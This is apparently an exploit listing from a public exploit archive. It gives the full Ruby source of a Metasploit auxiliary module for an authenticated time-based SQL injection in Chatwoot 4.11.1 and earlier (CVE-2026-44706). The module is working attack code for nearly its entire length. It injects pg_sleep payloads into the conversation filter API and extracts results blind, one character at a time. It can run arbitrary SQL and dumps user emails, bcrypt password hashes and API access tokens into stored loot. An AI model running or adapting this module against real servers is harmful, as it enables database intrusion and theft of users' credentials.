Share
## https://sploitus.com/exploit?id=PACKETSTORM:223093
==================================================================================================================================
| # Title : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.chatwoot.com |
==================================================================================================================================
[+] Summary : This Metasploit auxiliary module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to and including version 4.11.1.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
# Declares the module metadata and registers its datastore options.
#
# @param info [Hash] metadata handed in by the caller; it is merged with the
#   values declared here through update_info
def initialize(info = {})
  super(
    update_info(
      info,
      'Name' => 'Chatwoot SQL Injection (CVE-2026-44706) - FilterService#lt_gt_filter',
      # The text stays flush-left so the description string carries no extra
      # leading whitespace.
      'Description' => %q{
This module exploits a time-based SQL injection vulnerability in Chatwoot
versions <= 4.11.1. The vulnerability exists in the conversation filter
functionality, allowing an authenticated attacker to execute arbitrary
SQL queries, extract sensitive data, and retrieve user credentials.
},
      'Author' => ['indoushka'],
      'License' => MSF_LICENSE,
      'References' => [
        ['URL', 'https://hakaisecurity.io'],
        # CVE references take the bare identifier, without a "CVE-" prefix.
        ['CVE', '2026-44706']
      ],
      'DisclosureDate' => '2026-06-09',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # This auxiliary module never opens a session, so no session
        # reliability rating applies.
        'Reliability' => [],
        'SideEffects' => [IOC_IN_LOGS]
      }
    )
  )

  register_options([
    OptString.new('TARGETURI', [true, 'Base path for Chatwoot', '/']),
    OptString.new('API_TOKEN', [true, 'Chatwoot API access token', '']),
    OptInt.new('ACCOUNT_ID', [true, 'Target account ID', 1]),
    OptEnum.new('ACTION', [true, 'Action to perform', 'check', ['check', 'timebased', 'extract', 'creds']]),
    OptString.new('SQL_QUERY', [false, 'SQL query for extract mode', 'SELECT version()']),
    OptInt.new('MAX_LEN', [false, 'Maximum string length for extraction', 200]),
    OptInt.new('SLEEP_TIME', [false, 'Time in seconds for sleep-based injection', 2]),
    OptFloat.new('THRESHOLD', [false, 'Time threshold for detecting sleep (seconds)', 1.5])
  ])
end
# Delay, in seconds, that blind_check asks the database to sleep for when a
# tested condition is true.
#
# @return [Integer] the SLEEP_TIME datastore value (registered as an OptInt)
def sleep_time
datastore['SLEEP_TIME']
end
# Minimum elapsed time, in seconds, at which blind_check treats a request as
# having been delayed.
#
# @return [Float] the THRESHOLD datastore value (registered as an OptFloat)
def threshold
datastore['THRESHOLD']
end
# Wraps an SQL fragment in the body sent to the conversation filter endpoint.
#
# The fragment is spliced into the single value of a `created_at` /
# `is_greater_than` filter, between a quote that closes the first date
# literal and a quote that opens the last one.
#
# @param injected_sql [String] SQL fragment placed between the two date casts
# @return [Hash] request body holding one filter under the 'payload' key
def build_payload(injected_sql)
  date_filter = {
    'attribute_key' => 'created_at',
    'filter_operator' => 'is_greater_than',
    'values' => ["2024-01-01'::date #{injected_sql} 'epoch'::date > '2024-01-01"],
    'query_operator' => nil
  }

  { 'payload' => [date_filter] }
end
# POSTs a filter body to the conversation filter endpoint of the configured
# account, authenticating with the API_TOKEN option.
#
# @param payload [Hash] request body; serialized with to_json
# @param timeout [Integer] seconds to wait for the response
# @return [Object, nil] the response returned by send_request_cgi, or nil
#   when a Rex connection or timeout error is raised
def send_filter_request(payload, timeout = 60)
  endpoint = normalize_uri(
    target_uri.path,
    "/api/v1/accounts/#{datastore['ACCOUNT_ID']}/conversations/filter"
  )

  # send_request_cgi takes the deadline as its second positional argument;
  # a 'timeout' key inside the options hash does not set it.
  send_request_cgi(
    {
      'method' => 'POST',
      'uri' => endpoint,
      'ctype' => 'application/json',
      'headers' => {
        'api_access_token' => datastore['API_TOKEN']
      },
      'data' => payload.to_json
    },
    timeout
  )
rescue ::Rex::ConnectionError, ::Rex::TimeoutError => e
  print_error("Request failed: #{e.message}")
  nil
end
# Tests a boolean SQL condition through response timing.
#
# The condition is wrapped in a CASE expression that calls
# pg_sleep(sleep_time) when it holds and pg_sleep(0) otherwise; the request
# is then timed.
#
# @param condition [String] SQL boolean expression to evaluate
# @return [Boolean] true when a response arrived and the request took at
#   least `threshold` seconds; false otherwise
def blind_check(condition)
  sqli = "AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != 'x' OR"
  payload = build_payload(sqli)

  start_time = Time.now
  res = send_filter_request(payload, sleep_time + 30)
  elapsed = Time.now - start_time

  # A request that produced no response says nothing about the condition,
  # however long it took to fail.
  return false unless res

  elapsed >= threshold
end
# Recovers the integer value of an SQL expression by bisecting a range with
# blind_check.
#
# Each step first probes for equality with the midpoint and, failing that,
# probes whether the value is greater to decide which half to keep.
#
# @param expression [String] SQL expression yielding an integer
# @param low [Integer] inclusive lower bound of the search range
# @param high [Integer] inclusive upper bound of the search range
# @return [Integer, nil] the value, or nil when no candidate in the range
#   was confirmed
def extract_int(expression, low = 0, high = 10000)
  floor = low
  ceiling = high

  until floor > ceiling
    guess = (floor + ceiling) / 2
    return guess if blind_check("(#{expression}) = #{guess}")

    if blind_check("(#{expression}) > #{guess}")
      floor = guess + 1
    else
      ceiling = guess - 1
    end
  end

  nil
end
# Recovers the text value of an SQL expression one character at a time.
#
# The length is obtained first through extract_int; every position is then
# compared against each candidate character with blind_check until one
# matches. Positions with no match are recorded as '?'. Progress is echoed
# with print as characters are found.
#
# @param expression [String] SQL expression whose text form is extracted
# @param max_len [Integer] largest length the length search will consider
# @param charset [Array<String>, nil] candidate characters, tried in order;
#   nil selects the built-in alphabet of letters, digits and punctuation
# @return [String] the recovered text, or '' when the length is not found
def extract_string(expression, max_len = 200, charset = nil)
  alphabet = charset
  alphabet ||= (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a +
    ['@', '.', '_', '-', ':', '$', '/', ' ', '!', '#', '%', '^', '&', '*',
     '(', ')', '+', '=', '[', ']', '{', '}', '|', ';', "'", ',', '<', '>',
     '?', '~', '`', '"', '\\'])

  total = extract_int("length((#{expression})::text)", 0, max_len)
  return '' unless total

  print_status("Extracting #{total} characters...")

  recovered = (1..total).map do |pos|
    hit = alphabet.find do |candidate|
      # Single quotes are doubled so the candidate stays inside its literal.
      quoted = candidate.gsub("'", "''")
      blind_check("substring((#{expression})::text,#{pos},1) = '#{quoted}'")
    end

    shown = hit || '?'
    print(shown)
    shown
  end

  print_line
  recovered.join
end
# Compares the conversation count of an ordinary filter with the count
# returned when "OR TRUE OR" is spliced into the same filter.
#
# The baseline filters on created_at > 2099-01-01 (presumably matching
# nothing on a real instance - confirm against the target's data). A larger
# count for the altered filter is reported as a confirmed injection.
#
# @return [Boolean] true when the altered filter returns more conversations
#   than the baseline; false when either request does not answer 200, when a
#   body cannot be read as the expected JSON, or when the counts do not differ
def check_vulnerability
  print_status("Checking vulnerability with OR TRUE bypass...")

  baseline_filter = {
    'payload' => [
      {
        'attribute_key' => 'created_at',
        'filter_operator' => 'is_greater_than',
        'values' => ['2099-01-01'],
        'query_operator' => nil
      }
    ]
  }

  normal_res = send_filter_request(baseline_filter)
  return false unless normal_res&.code == 200

  normal_count = JSON.parse(normal_res.body).dig('meta', 'all_count') || 0

  malicious_res = send_filter_request(build_payload('OR TRUE OR'))
  return false unless malicious_res&.code == 200

  malicious_count = JSON.parse(malicious_res.body).dig('meta', 'all_count') || 0
  print_status("Normal count: #{normal_count} | Malicious count: #{malicious_count}")

  confirmed = malicious_count > normal_count
  if confirmed
    print_good("SQL injection confirmed!")
  else
    print_error("Inconclusive - target may not be vulnerable")
  end
  confirmed
rescue JSON::ParserError, TypeError => e
  # A 200 answer that is not the expected JSON document (an HTML page, a
  # top-level array, ...) is reported instead of aborting the module run.
  print_error("Could not parse filter response: #{e.message}")
  false
end
# Times one request carrying pg_sleep(0) and one carrying pg_sleep(3) and
# reports whether the second took at least 2.5 seconds longer.
#
# The outcome is only printed. The method stops early, with an error
# message, when either request yields no response, because the duration of a
# failed request is not a usable measurement.
#
# @return [void]
def timebased_test
  print_status("Testing time-based injection...")

  # Sends one probe and returns its duration in seconds, or nil when the
  # request produced no response.
  timed_probe = lambda do |delay|
    start_time = Time.now
    res = send_filter_request(build_payload("AND (SELECT pg_sleep(#{delay}))::text != 'x' OR"))
    res ? Time.now - start_time : nil
  end

  base_time = timed_probe.call(0)
  unless base_time
    print_error("Baseline request failed - cannot measure timing")
    return
  end
  print_status("Baseline time: #{format('%.2f', base_time)}s")

  sleep_time_actual = timed_probe.call(3)
  unless sleep_time_actual
    print_error("Delayed request failed - cannot measure timing")
    return
  end
  print_status("Sleep(3) time: #{format('%.2f', sleep_time_actual)}s")

  delta = sleep_time_actual - base_time
  print_status("Delta: #{format('%.2f', delta)}s")

  if delta >= 2.5
    print_good("Time-based injection confirmed!")
  else
    print_error("Time-based injection may not be exploitable")
  end
end
# Runs the SQL_QUERY option through extract_string, limited to MAX_LEN
# characters, prints the outcome and stores a non-blank result as loot.
#
# @return [Object] whatever store_loot or print_error returns
def extract_data
  sql = datastore['SQL_QUERY']
  limit = datastore['MAX_LEN']

  print_status("Extracting: #{sql}")
  output = extract_string(sql, limit)
  return print_error("Extraction failed") unless output.present?

  print_good("Result: #{output}")
  store_loot('chatwoot_sql_extract', 'text/plain', rhost, output, 'sql_extract.txt', "Extracted SQL query result")
end
# Walks the users table and collects, per user, the id, e-mail address,
# encrypted password and one access token, then reports and stores them.
#
# The user count is searched in 0..100 and ids in 1..100000. Each text field
# is read with extract_string; the e-mail and hash fields use restricted
# alphabets, the token uses extract_string's default alphabet. Collected
# records are passed to report_cred and written as JSON loot.
#
# @return [void]
def extract_credentials
  print_status("Extracting user credentials...")
  print_status("Counting users...")

  user_count = extract_int("SELECT count(*) FROM users", 0, 100)
  unless user_count && user_count > 0
    print_error("Could not determine user count")
    return
  end
  print_good("Found #{user_count} user(s)")

  lower = ('a'..'z').to_a
  upper = ('A'..'Z').to_a
  digits = ('0'..'9').to_a
  # Every candidate appears exactly once: a repeated entry would only add a
  # wasted probe each time the scan passes over it.
  hc_charset = lower + digits + ['$', '.', '/'] + upper
  ec_charset = lower + digits + ['@', '.', '_', '-', '+'] + upper

  creds = []
  user_count.times do |i|
    print_status("Processing user #{i + 1}/#{user_count}")
    uid = extract_int("SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{i}", 1, 100000)
    next unless uid

    print_status(" ID: #{uid}")
    email = extract_string("SELECT email FROM users WHERE id=#{uid}", 100, ec_charset)
    password_hash = extract_string("SELECT encrypted_password FROM users WHERE id=#{uid}", 60, hc_charset)
    token = extract_string("SELECT token FROM access_tokens WHERE owner_type='User' AND owner_id=#{uid} LIMIT 1", 30)

    creds << {
      id: uid,
      email: email,
      hash: password_hash,
      token: token
    }

    print_good(" Email: #{email}") if email.present?
    print_good(" Hash: #{password_hash}") if password_hash.present?
    print_good(" Token: #{token}") if token.present?
  end

  creds.each do |cred|
    if cred[:hash].present?
      report_cred(
        user: cred[:email],
        hash: cred[:hash],
        private_type: :nonreplayable_hash,
        private_data: cred[:hash],
        jtr_format: 'bcrypt'
      )
    end

    if cred[:token].present?
      report_cred(
        user: cred[:email],
        private_type: :password,
        private_data: cred[:token]
      )
    end
  end

  loot_data = JSON.pretty_generate(creds)
  store_loot('chatwoot_credentials', 'application/json', rhost, loot_data, 'chatwoot_creds.json', 'Extracted credentials')
  print_good("Credentials saved to loot")
end
# Records one credential through create_credential, tied to the current
# target host and port under the service name 'chatwoot'.
#
# Nothing is recorded when the user name or the private data is blank. Any
# StandardError raised while recording is printed rather than propagated.
#
# @param opts [Hash] credential description
# @option opts [String] :user account name
# @option opts [String] :private_data password, token or hash
# @option opts [Symbol] :private_type kind of private data; :password when
#   omitted
# @option opts [String] :jtr_format John the Ripper format name, forwarded
#   when given
# @return [Object, nil] the result of create_credential, nil when skipped
def report_cred(opts = {})
  return unless opts[:user].present? && opts[:private_data].present?

  credential_data = {
    origin_type: :service,
    module_fullname: fullname,
    username: opts[:user],
    private_data: opts[:private_data],
    private_type: opts[:private_type] || :password,
    workspace_id: myworkspace.id,
    address: rhost,
    port: rport,
    service_name: 'chatwoot',
    protocol: 'tcp'
  }
  # Callers pass the hash format alongside hash credentials; forward it so
  # the stored hash keeps that information.
  credential_data[:jtr_format] = opts[:jtr_format] if opts[:jtr_format].present?

  create_credential(credential_data)
rescue StandardError => e
  print_error("Failed to report credential: #{e.message}")
end
# Module entry point: verifies the API token against /api/v1/profile and
# then runs the routine selected by the ACTION option.
#
# The run stops with an error message when the token is blank or when the
# profile request does not answer 200. A profile body that cannot be read
# only downgrades the success message.
#
# @return [Object, nil] the selected routine's return value, or nil when the
#   run stops early or ACTION matches no routine
def run
  token = datastore['API_TOKEN']
  unless token.present?
    print_error("API_TOKEN is required")
    return
  end

  print_status("Verifying authentication...")
  profile_res = send_request_cgi(
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '/api/v1/profile'),
    'headers' => { 'api_access_token' => token }
  )

  unless profile_res&.code == 200
    print_error("Authentication failed - invalid token or URL")
    return
  end

  begin
    who = JSON.parse(profile_res.body)
    print_good("Authenticated as: #{who['name']} (#{who['email']}) - Account ID: #{datastore['ACCOUNT_ID']}")
  rescue StandardError
    print_status("Authentication successful")
  end

  routines = {
    'check' => :check_vulnerability,
    'timebased' => :timebased_test,
    'extract' => :extract_data,
    'creds' => :extract_credentials
  }
  routine = routines[datastore['ACTION']]
  send(routine) if routine
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================